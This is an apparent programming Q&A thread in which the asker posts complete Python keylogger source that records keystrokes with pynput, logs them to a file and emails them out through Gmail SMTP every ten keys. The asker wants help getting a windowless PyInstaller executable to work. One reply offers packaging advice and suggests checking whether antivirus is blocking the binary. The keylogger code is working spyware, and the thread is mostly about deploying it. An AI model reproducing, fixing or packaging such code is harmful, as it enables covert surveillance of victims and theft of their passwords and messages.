# Code(keylogger) converted into .exe with pyinstaller not working as it was

Tags: python-3.x, pyinstaller, smtplib, pynput

I was working with a keylogger code in python 3.5. It records keystrokes with pynput in a txt file and also sends the keystrokes recorded via email with smtplib. 
The code works correctly as it should when it is a .py file but doesn't record keystrokes in a file nor sends them through email when converted into a .exe file with pyinstaller. Please help me find out what's causing this problem and fix it. Thank you for looking into this matter. Have a good day!
I used the command pyinstaller - w - F filename.py to convert it.

```
from pynput.keyboard import Listener
import smtplib
#Var that counts for the if statement==========
c = 0
#Var that collects keystrokes for email========
strokes = ''

#Codes for the smtp email======================
serv = smtplib.SMTP('smtp.gmail.com', 587)
serv.ehlo()
serv.starttls()
serv.login('email@gmail.com', 'password')

#Function for writing keycodes to the file=====
def writeToFile(key):
    global c, strokes
    keydata = str(key)
    keydata = keydata.replace("'","")

    `enter code here`#Special keys decoder===========================
    if keydata == 'Key.space':
            keydata = ' '

    if keydata == 'Key.shift_r':
            keydata = ' (r_shift) '

    if keydata == 'Key.shift':
            keydata = ' (l_shift) '

    if keydata == 'Key.ctrl':
            keydata = ' (l_ctrl) '

    if keydata == 'Key.ctrl_r':
            keydata = ' (r_ctrl) '

    if keydata == 'Key.enter':
            keydata = ' (enter) \n '    

    #Opens or creates the log file===============
    with open("log.txt", 'a') as f:
            f.write(keydata)
            c += 1

            #Keystrokes are added for the email==
            strokes = strokes + str(keydata)

            #Condition for sending the email=====
            if c >= 10:
                print(strokes)
                c = 0
                serv.sendmail('email@gmail.com', 'receiver@gmail.com', strokes)
                serv.close()

#For listening to keycodes==================
with Listener(on_press=writeToFile) as l:
    l.join()
```

Answer (score 0):

1-for me pyinstaller was a headache for me, use auto-py-to-exe tool it will help you.
2-when running .py file ,It is telling pc : I am under python's interpreter lead so i have all python's Access . but when running exe it is unknown software ,so check if anti-malware software/firewall is blocking you exe software.

---

**Auto-py-to-exe** helped me to convert py to exe.
at first, my exe didn't work and after some search i found out that most of problems are because of hidden imports/files and you have to add them manually .
so how to do so in auto-py-to-exe ?

> to add the modules using the auto-py-to-exe :what modules are you using? for example: if you need to install the requests lib to make the code work,then use the auto-py-to-exe and there is option to add files ,use it to add the requests from the site-packages folder

for additional help and explaination +auto-py-to-exe troubleshooting [This will help](https://nitratine.net/blog/post/issues-when-using-auto-py-to-exe/)

Comment: I used it too. Still it didn't work. I tried it with admin privileges too and checked for anti virus interference. Can you please try to convert in your pc? I used the command pyinstaller - w - F filename.py to convert it into exe. Thank you for your time. Have a good day

Comment: Ok i will do it for you,you can try something else as final try: you may be missing some files and the exe has errors but you can't see,so :1-try to run it through cmd 2-when using auto-py-to-exe try to add the modules you installed to make the keylogger run.

Comment: Thanks for replying, but could you please explain to me how am I supposed to add the modules I installed in auto .py to .exe?? I am going to do things again but according to the processes you mentioned.

Comment: It didn't work out. Going to convert it into batch file instead. Thanks for your help

Comment: to add the modules using the auto-py-to-exe :what modules are you using? like this: if you need to install the requests lib to make the code work,then use the auto-py-.. and there is option to add files ,use it to add the requests from the site-packages folder,you can see this too https://nitratine.net/blog/post/issues-when-using-auto-py-to-exe/

Comment: I edited my answer to be full ,mark it as correct if it is usefull for other people